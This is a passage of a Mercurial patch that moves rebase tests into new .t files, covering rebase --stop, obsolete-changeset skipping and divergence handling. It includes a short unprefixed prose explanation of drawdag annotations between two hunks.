- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
-
- $ cp -R . $TESTTMP/hidden-state2
-
- $ hg log -G
- @ 2:b18e25de2cf5 D
- |
- | % 1:2ec65233581b B (pruned using prune)
- |/
- o 0:426bada5c675 A
-
- $ hg summary
- parent: 2:b18e25de2cf5 tip
- D
- branch: default
- commit: 1 modified, 1 added, 1 unknown, 1 unresolved
- update: 1 new changesets, 2 branch heads (merge)
- phases: 3 draft
- rebase: 0 rebased, 2 remaining (rebase --continue)
-
- $ hg rebase --abort
- rebase aborted
-
-Also test --continue for the above case
-
- $ cd $TESTTMP/hidden-state2
- $ hg resolve -m
- (no more unresolved files)
- continue: hg rebase --continue
- $ hg rebase --continue
- rebasing 1:2ec65233581b "B"
- rebasing 3:7829726be4dc tip "C"
- $ hg log -G
- @ 5:1964d5d5b547 C
- |
- o 4:68deb90c12a2 B
- |
- o 2:b18e25de2cf5 D
- |
- o 0:426bada5c675 A
-
-====================
-Test --stop option |
-====================
- $ cd ..
- $ hg init rbstop
- $ cd rbstop
- $ echo a>a
- $ hg ci -Aqma
- $ echo b>b
- $ hg ci -Aqmb
- $ echo c>c
- $ hg ci -Aqmc
- $ echo d>d
- $ hg ci -Aqmd
- $ hg up 0 -q
- $ echo f>f
- $ hg ci -Aqmf
- $ echo D>d
- $ hg ci -Aqm "conflict with d"
- $ hg up 3 -q
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- 1 new orphan changesets
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 7:7fffad344617 test
- | c
- |
- o 6:b15528633407 test
- | b
- |
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | x 2:177f92b77385 test
- | | c
- | |
- | x 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test it aborts if unstable csets is not allowed:
-===============================================
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > evolution.allowunstable=False
- > EOF
-
- $ hg strip 6 --no-backup -q
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- abort: cannot remove original changesets with unrebased descendants
- (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets)
- [255]
- $ hg rebase --abort
- saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
- rebase aborted
-
-Test --stop when --keep is passed:
-==================================
- $ hg rebase -s 1 -d 5 --keep
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 7:7fffad344617 test
- | c
- |
- o 6:b15528633407 test
- | b
- |
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test --stop aborts when --collapse was passed:
-=============================================
- $ cat >> $HGRCPATH << EOF
- > [experimental]
- > evolution.allowunstable=True
- > EOF
-
- $ hg strip 6
- saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
- $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d"
- rebasing 1:d2ae7f538514 "b"
- rebasing 2:177f92b77385 "c"
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- abort: cannot stop in --collapse session
- [255]
- $ hg rebase --abort
- rebase aborted
- $ hg diff
- $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n"
- o 5:00bfc9898aeb test
- | conflict with d
- |
- o 4:dafd40200f93 test
- | f
- |
- | @ 3:055a42cdd887 test
- | | d
- | |
- | o 2:177f92b77385 test
- | | c
- | |
- | o 1:d2ae7f538514 test
- |/ b
- |
- o 0:cb9a9f314b8b test
- a
-
-Test --stop raise errors with conflicting options:
-=================================================
- $ hg rebase -s 3 -d 5
- rebasing 3:055a42cdd887 "d"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop --dry-run
- abort: cannot specify both --stop and --dry-run
- [10]
-
- $ hg rebase -s 3 -d 5
- abort: rebase in progress
- (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop')
- [20]
- $ hg rebase --stop --continue
- abort: cannot specify both --stop and --continue
- [10]
-
-Test --stop moves bookmarks of original revisions to new rebased nodes:
-======================================================================
- $ cd ..
- $ hg init repo
- $ cd repo
-
- $ echo a > a
- $ hg ci -Am A
- adding a
-
- $ echo b > b
- $ hg ci -Am B
- adding b
- $ hg book X
- $ hg book Y
-
- $ echo c > c
- $ hg ci -Am C
- adding c
- $ hg book Z
-
- $ echo d > d
- $ hg ci -Am D
- adding d
-
- $ hg up 0 -q
- $ echo e > e
- $ hg ci -Am E
- adding e
- created new head
-
- $ echo doubt > d
- $ hg ci -Am "conflict with d"
- adding d
-
- $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
- @ 5: 39adf30bc1be 'conflict with d' bookmarks:
- |
- o 4: 9c1e55f411b6 'E' bookmarks:
- |
- | o 3: 67a385d4e6f2 'D' bookmarks: Z
- | |
- | o 2: 49cb3485fa0c 'C' bookmarks: Y
- | |
- | o 1: 6c81ed0049f8 'B' bookmarks: X
- |/
- o 0: 1994f17a630e 'A' bookmarks:
-
- $ hg rebase -s 1 -d 5
- rebasing 1:6c81ed0049f8 X "B"
- rebasing 2:49cb3485fa0c Y "C"
- rebasing 3:67a385d4e6f2 Z "D"
- merging d
- warning: conflicts while merging d! (edit, then use 'hg resolve --mark')
- unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
- [240]
- $ hg rebase --stop
- 1 new orphan changesets
- $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n"
- o 7: 9c86c650b686 'C' bookmarks: Y
- |
- o 6: 9b87b54e5fd8 'B' bookmarks: X
- |
- @ 5: 39adf30bc1be 'conflict with d' bookmarks:
- |
- o 4: 9c1e55f411b6 'E' bookmarks:
- |
- | * 3: 67a385d4e6f2 'D' bookmarks: Z
- | |
- | x 2: 49cb3485fa0c 'C' bookmarks:
- | |
- | x 1: 6c81ed0049f8 'B' bookmarks:
- |/
- o 0: 1994f17a630e 'A' bookmarks:
-
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete2.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,341 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Skip obsolete changeset even with multiple hops
+-----------------------------------------------
+
+setup
+
+ $ hg init obsskip
+ $ cd obsskip
+ $ cat << EOF >> .hg/hgrc
+ > [experimental]
+ > rebaseskipobsolete = True
+ > [extensions]
+ > strip =
+ > EOF
+ $ echo A > A
+ $ hg add A
+ $ hg commit -m A
+ $ echo B > B
+ $ hg add B
+ $ hg commit -m B0
+ $ hg commit --amend -m B1
+ $ hg commit --amend -m B2
+ $ hg up --hidden 'desc(B0)'
+ 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ updated to hidden changeset a8b11f55fb19
+ (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
+ $ echo C > C
+ $ hg add C
+ $ hg commit -m C
+ 1 new orphan changesets
+ $ hg log -G
+ @ 4:212cb178bcbb C
+ |
+ | o 3:261e70097290 B2
+ | |
+ x | 1:a8b11f55fb19 B0 (rewritten using amend as 3:261e70097290)
+ |/
+ o 0:4a2df7238c3b A
+
+
+Rebase finds its way through a chain of markers
+
+ $ hg rebase -d 'desc(B2)'
+ note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 3:261e70097290 "B2"
+ rebasing 4:212cb178bcbb tip "C"
+
+Even when the chain includes a missing node
+
+ $ hg up --hidden 'desc(B0)'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ updated to hidden changeset a8b11f55fb19
+ (hidden revision 'a8b11f55fb19' was rewritten as: 261e70097290)
+ $ echo D > D
+ $ hg add D
+ $ hg commit -m D
+ 1 new orphan changesets
+ $ hg --hidden strip -r 'desc(B1)'
+ saved backup bundle to $TESTTMP/obsskip/.hg/strip-backup/86f6414ccda7-b1c452ee-backup.hg
+ 1 new orphan changesets
+ $ hg log -G
+ @ 5:1a79b7535141 D
+ |
+ | o 4:ff2c4d47b71d C
+ | |
+ | o 2:261e70097290 B2
+ | |
+ x | 1:a8b11f55fb19 B0 (rewritten using amend as 2:261e70097290)
+ |/
+ o 0:4a2df7238c3b A
+
+
+ $ hg rebase -d 'desc(B2)'
+ note: not rebasing 1:a8b11f55fb19 "B0", already in destination as 2:261e70097290 "B2"
+ rebasing 5:1a79b7535141 tip "D"
+ $ hg up 4
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "O" > O
+ $ hg add O
+ $ hg commit -m O
+ $ echo "P" > P
+ $ hg add P
+ $ hg commit -m P
+ $ hg log -G
+ @ 8:8d47583e023f P
+ |
+ o 7:360bbaa7d3ce O
+ |
+ | o 6:9c48361117de D
+ | |
+ o | 4:ff2c4d47b71d C
+ |/
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg debugobsolete `hg log -r 7 -T '{node}\n'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+ $ hg rebase -d 6 -r "4::"
+ rebasing 4:ff2c4d47b71d "C"
+ note: not rebasing 7:360bbaa7d3ce "O", it has no successor
+ rebasing 8:8d47583e023f tip "P"
+
+If all the changesets to be rebased are obsolete and present in the
+destination, we should display a friendly error message
+
+ $ hg log -G
+ @ 10:121d9e3bc4c6 P
+ |
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+
+ $ hg up 9
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "non-relevant change" > nonrelevant
+ $ hg add nonrelevant
+ $ hg commit -m nonrelevant
+ created new head
+ $ hg debugobsolete `hg log -r 11 -T '{node}\n'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G
+ @ 11:f44da1f4954c nonrelevant (pruned)
+ |
+ | o 10:121d9e3bc4c6 P
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg rebase -r . -d 10
+ note: not rebasing 11:f44da1f4954c tip "nonrelevant", it has no successor
+
+If a rebase is going to create divergence, it should abort
+
+ $ hg log -G
+ @ 10:121d9e3bc4c6 P
+ |
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+
+ $ hg up 9
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "john" > doe
+ $ hg add doe
+ $ hg commit -m "john doe"
+ created new head
+ $ hg up 10
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "foo" > bar
+ $ hg add bar
+ $ hg commit --amend -m "10'"
+ $ hg up 10 --hidden
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ updated to hidden changeset 121d9e3bc4c6
+ (hidden revision '121d9e3bc4c6' was rewritten as: 77d874d096a2)
+ $ echo "bar" > foo
+ $ hg add foo
+ $ hg commit -m "bar foo"
+ 1 new orphan changesets
+ $ hg log -G
+ @ 14:73568ab6879d bar foo
+ |
+ | o 13:77d874d096a2 10'
+ | |
+ | | o 12:3eb461388009 john doe
+ | |/
+ x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+ $ hg summary
+ parent: 14:73568ab6879d tip (orphan)
+ bar foo
+ branch: default
+ commit: (clean)
+ update: 2 new changesets, 3 branch heads (merge)
+ phases: 8 draft
+ orphan: 1 changesets
+ $ hg rebase -s 10 -d 12
+ abort: this rebase will cause divergences from: 121d9e3bc4c6
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+ $ hg log -G
+ @ 14:73568ab6879d bar foo
+ |
+ | o 13:77d874d096a2 10'
+ | |
+ | | o 12:3eb461388009 john doe
+ | |/
+ x | 10:121d9e3bc4c6 P (rewritten using amend as 13:77d874d096a2)
+ |/
+ o 9:4be60e099a77 C
+ |
+ o 6:9c48361117de D
+ |
+ o 2:261e70097290 B2
+ |
+ o 0:4a2df7238c3b A
+
+With experimental.evolution.allowdivergence=True, rebase can create divergence
+
+ $ hg rebase -s 10 -d 12 --config experimental.evolution.allowdivergence=True
+ rebasing 10:121d9e3bc4c6 "P"
+ rebasing 14:73568ab6879d tip "bar foo"
+ 2 new content-divergent changesets
+ $ hg summary
+ parent: 16:61bd55f69bc4 tip
+ bar foo
+ branch: default
+ commit: (clean)
+ update: 1 new changesets, 2 branch heads (merge)
+ phases: 8 draft
+ content-divergent: 2 changesets
+
+rebase --continue + skipped revs because their successors are in destination.
+We make a change in trunk and work on conflicting changes to make the rebase
+abort.
+
+ $ hg log -G -r 16::
+ @ 16:61bd55f69bc4 bar foo
+ |
+ ~
+
+Create the two changes in trunk
+ $ printf "a" > willconflict
+ $ hg add willconflict
+ $ hg commit -m "willconflict first version"
+
+ $ printf "dummy" > C
+ $ hg commit -m "dummy change successor"
+
+Create the changes that we will rebase
+ $ hg update -C 16 -q
+ $ printf "b" > willconflict
+ $ hg add willconflict
+ $ hg commit -m "willconflict second version"
+ created new head
+ $ printf "dummy" > K
+ $ hg add K
+ $ hg commit -m "dummy change"
+ $ printf "dummy" > L
+ $ hg add L
+ $ hg commit -m "dummy change"
+ $ hg debugobsolete `hg log -r ".^" -T '{node}'` `hg log -r 18 -T '{node}'` --config experimental.evolution=true
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ 1 new orphan changesets
+
+ $ hg log -G -r 16::
+ @ 21:7bdc8a87673d dummy change
+ |
+ x 20:8b31da3c4919 dummy change (rewritten as 18:601db7a18f51)
+ |
+ o 19:b82fb57ea638 willconflict second version
+ |
+ | o 18:601db7a18f51 dummy change successor
+ | |
+ | o 17:357ddf1602d5 willconflict first version
+ |/
+ o 16:61bd55f69bc4 bar foo
+ |
+ ~
+ $ hg rebase -r ".^^ + .^ + ." -d 18
+ rebasing 19:b82fb57ea638 "willconflict second version"
+ merging willconflict
+ warning: conflicts while merging willconflict! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+
+ $ hg resolve --mark willconflict
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase --continue
+ rebasing 19:b82fb57ea638 "willconflict second version"
+ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor"
+ rebasing 21:7bdc8a87673d tip "dummy change"
+ $ cd ..
+
+Can rebase pruned and rewritten commits with --keep
+
+ $ hg init keep
+ $ cd keep
+ $ hg debugdrawdag <<'EOS'
+ > D
+ > |
+ > C
+ > |
+ > F B E # prune: B
+ > \|/ # rebase: C -> E
+ > A
+ > EOS
+ 1 new orphan changesets
+
+ $ hg rebase -b D -d F --keep
+ rebasing 1:112478962961 B "B"
+ rebasing 4:26805aba1e60 C "C"
+ rebasing 5:f585351a92f8 D tip "D"
+
+ $ cd ..
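
A quick sketch of the drawdag annotations these graphs use, since the
obsolescence relations all come from them: "# replace: X -> Y" records a
marker rewriting X into Y, "# prune: X" marks X as pruned with no successor,
and "# amend: X -> Y" / "# rebase: X -> Y" do the same with the corresponding
operation recorded in the marker metadata. A minimal illustrative graph
(assuming the drawdag.py extension from the test suite, as enabled in the
setup blocks):

  $ hg debugdrawdag <<'EOS'
  > B C  # replace: B -> C
  > |/
  > A
  > EOS

Here B is obsoleted in favor of its sibling C, the basic shape that the
divergence cases in the next file build on.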
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-rebase-obsolete3.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,669 @@
+==========================
+Test rebase with obsolete
+==========================
+
+Enable obsolete
+
+ $ cat >> $HGRCPATH << EOF
+ > [command-templates]
+ > log= {rev}:{node|short} {desc|firstline}{if(obsolete,' ({obsfate})')}
+ > [experimental]
+ > evolution.createmarkers=True
+ > evolution.allowunstable=True
+ > [phases]
+ > publish=False
+ > [extensions]
+ > rebase=
+ > drawdag=$TESTDIR/drawdag.py
+ > strip=
+ > EOF
+
+Divergence cases due to obsolete changesets
+-------------------------------------------
+
+We should ignore branches with unstable changesets when they are based on an
+obsolete changeset whose successor is in the rebase set.
+
+ $ hg init divergence
+ $ cd divergence
+ $ cat >> .hg/hgrc << EOF
+ > [extensions]
+ > strip =
+ > [alias]
+ > strip = strip --no-backup --quiet
+ > [templates]
+ > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n'
+ > EOF
+
+ $ hg debugdrawdag <<EOF
+ > e f
+ > | |
+ > d' d # replace: d -> d'
+ > \ /
+ > c
+ > |
+ > x b
+ > \|
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg log -G -r 'a'::
+ * 7:1143e9adc121 f
+ |
+ | o 6:d60ebfa0f1cb e
+ | |
+ | o 5:027ad6c5830d d'
+ | |
+ x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+
+Changeset d and its descendants are excluded to avoid divergence of d, which
+would occur because the successor of d (d') is also in the rebase set. As a
+consequence, f (a descendant of d) is left behind.
+
+ $ hg rebase -b 'e' -d 'x'
+ rebasing 1:488e1b7e7341 b "b"
+ rebasing 3:a82ac2b38757 c "c"
+ note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence
+ rebasing 5:027ad6c5830d d' "d'"
+ rebasing 6:d60ebfa0f1cb e "e"
+ $ hg log -G -r 'a'::
+ o 11:eb6d63fc4ed5 e
+ |
+ o 10:44d8c724a70c d'
+ |
+ o 9:d008e6b4d3fd c
+ |
+ o 8:67e8f4a16c49 b
+ |
+ | * 7:1143e9adc121 f
+ | |
+ | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5)
+ | | |
+ | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c)
+ | | |
+ | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ | |/
+ | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd)
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49)
+ |/
+ o 0:b173517d0057 a
+
+ $ hg strip -r 8:
+ $ hg log -G -r 'a'::
+ * 7:1143e9adc121 f
+ |
+ | o 6:d60ebfa0f1cb e
+ | |
+ | o 5:027ad6c5830d d'
+ | |
+ x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d)
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+
+If the rebase set has an obsolete changeset (d) with a successor (d') outside
+the rebase set and none in the destination, we still get the divergence
+warning. By allowing divergence, we can perform the rebase.
+
+ $ hg rebase -r 'c'::'f' -d 'x'
+ abort: this rebase will cause divergences from: 76be324c128b
+ (to force the rebase please set experimental.evolution.allowdivergence=True)
+ [20]
+ $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x'
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ rebasing 7:1143e9adc121 f tip "f"
+ 1 new orphan changesets
+ 2 new content-divergent changesets
+ $ hg log -G -r 'a':: -T instabilities
+ o 10:e1744ea07510 f
+ |
+ * 9:e2b36ea9a0a0 d (content-divergent)
+ |
+ o 8:6a0376de376e c
+ |
+ | x 7:1143e9adc121 f
+ | |
+ | | * 6:d60ebfa0f1cb e (orphan)
+ | | |
+ | | * 5:027ad6c5830d d' (orphan content-divergent)
+ | | |
+ | x | 4:76be324c128b d
+ | |/
+ | x 3:a82ac2b38757 c
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | o 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+ $ hg strip -r 8:
+
+(Not skipping obsoletes means that divergence is allowed.)
+
+ $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x'
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ rebasing 7:1143e9adc121 f tip "f"
+ 1 new orphan changesets
+ 2 new content-divergent changesets
+
+ $ hg strip -r 0:
+
+Similar test on a more complex graph
+
+ $ hg debugdrawdag <<EOF
+ > g
+ > |
+ > f e
+ > | |
+ > e' d # replace: e -> e'
+ > \ /
+ > c
+ > |
+ > x b
+ > \|
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg log -G -r 'a':
+ * 8:2876ce66c6eb g
+ |
+ | o 7:3ffec603ab53 f
+ | |
+ x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
+ | |
+ | o 5:63324dc512ea e'
+ | |
+ o | 4:76be324c128b d
+ |/
+ o 3:a82ac2b38757 c
+ |
+ | o 2:630d7c95eff7 x
+ | |
+ o | 1:488e1b7e7341 b
+ |/
+ o 0:b173517d0057 a
+
+ $ hg rebase -b 'f' -d 'x'
+ rebasing 1:488e1b7e7341 b "b"
+ rebasing 3:a82ac2b38757 c "c"
+ rebasing 4:76be324c128b d "d"
+ note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence
+ rebasing 5:63324dc512ea e' "e'"
+ rebasing 7:3ffec603ab53 f "f"
+ $ hg log -G -r 'a':
+ o 13:ef6251596616 f
+ |
+ o 12:b6f172e64af9 e'
+ |
+ | o 11:a1707a5b7c2c d
+ |/
+ o 10:d008e6b4d3fd c
+ |
+ o 9:67e8f4a16c49 b
+ |
+ | * 8:2876ce66c6eb g
+ | |
+ | | x 7:3ffec603ab53 f (rewritten using rebase as 13:ef6251596616)
+ | | |
+ | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea)
+ | | |
+ | | x 5:63324dc512ea e' (rewritten using rebase as 12:b6f172e64af9)
+ | | |
+ | x | 4:76be324c128b d (rewritten using rebase as 11:a1707a5b7c2c)
+ | |/
+ | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd)
+ | |
+ o | 2:630d7c95eff7 x
+ | |
+ | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49)
+ |/
+ o 0:b173517d0057 a
+
+
+issue5782
+ $ hg strip -r 0:
+ $ hg debugdrawdag <<EOF
+ > d
+ > |
+ > c1 c # replace: c -> c1
+ > \ /
+ > b
+ > |
+ > a
+ > EOF
+ 1 new orphan changesets
+ $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'`
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G -r 'a': --hidden
+ * 4:76be324c128b d
+ |
+ | x 3:ef8a456de8fa c1 (pruned)
+ | |
+ x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
+ |/
+ o 1:488e1b7e7341 b
+ |
+ o 0:b173517d0057 a
+
+ $ hg rebase -d 0 -r 2
+ note: not rebasing 2:a82ac2b38757 c "c", it has no successor
+ $ hg log -G -r 'a': --hidden
+ * 4:76be324c128b d
+ |
+ | x 3:ef8a456de8fa c1 (pruned)
+ | |
+ x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa)
+ |/
+ o 1:488e1b7e7341 b
+ |
+ o 0:b173517d0057 a
+
+ $ cd ..
+
+Start a normal rebase. When it runs into conflicts, rewrite one of the
+commits in the rebase set, causing divergence when the rebase continues.
+
+ $ hg init $TESTTMP/new-divergence-after-conflict
+ $ cd $TESTTMP/new-divergence-after-conflict
+ $ hg debugdrawdag <<'EOS'
+ > C2
+ > | C1
+ > |/
+ > B # B/D=B
+ > | D
+ > |/
+ > A
+ > EOS
+ $ hg rebase -r B::C1 -d D
+ rebasing 1:2ec65233581b B "B"
+ merging D
+ warning: conflicts while merging D! (edit, then use 'hg resolve --mark')
+ unresolved conflicts (see 'hg resolve', then 'hg rebase --continue')
+ [240]
+ $ hg debugobsolete $(hg log -r C1 -T '{node}') $(hg log -r C2 -T '{node}')
+ 1 new obsolescence markers
+ obsoleted 1 changesets
+ $ hg log -G
+ o 4:fdb9df6b130c C2
+ |
+ | x 3:7e5bfd3c08f0 C1 (rewritten as 4:fdb9df6b130c)
+ |/
+ | @ 2:b18e25de2cf5 D
+ | |
+ % | 1:2ec65233581b B
+ |/
+ o 0:426bada5c675 A
+
+ $ echo resolved > D
+ $ hg resolve -m D
+ (no more unresolved files)
+ continue: hg rebase --continue
+ $ hg rebase -c
+ rebasing 1:2ec65233581b B "B"
+ note: not rebasing 3:7e5bfd3c08f0 C1 "C1" and its descendants as this would cause divergence
+ 1 new orphan changesets
+
+Rebase merge where successor of one parent is equal to destination (issue5198)
+
+ $ hg init p1-succ-is-dest
+ $ cd p1-succ-is-dest
+
+ $ hg debugdrawdag <<EOF
+ > F
+ > /|
+ > E D B # replace: D -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d B -s D
+ note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B"
+ rebasing 4:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 5:50e9d60b99c6 F
+ |\
+ | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6)
+ | |/|
+ | o | 3:7fb047a69f22 E
+ | | |
+ | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961)
+ | |/
+ o | 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of other parent is equal to destination
+
+ $ hg init p2-succ-is-dest
+ $ cd p2-succ-is-dest
+
+ $ hg debugdrawdag <<EOF
+ > F
+ > /|
+ > E D B # replace: E -> B
+ > \|/
+ > A
+ > EOF
+ 1 new orphan changesets
+
+ $ hg rebase -d B -s E
+ note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B"
+ rebasing 4:66f1a38021c9 F tip "F"
+ $ hg log -G
+ o 5:aae1787dacee F
+ |\
+ | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee)
+ | |/|
+ | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961)
+ | | |
+ | o | 2:b18e25de2cf5 D
+ | |/
+ o / 1:112478962961 B
+ |/
+ o 0:426bada5c675 A
+
+ $ cd ..
+
+Rebase merge where successor of one parent is ancestor of destination
+
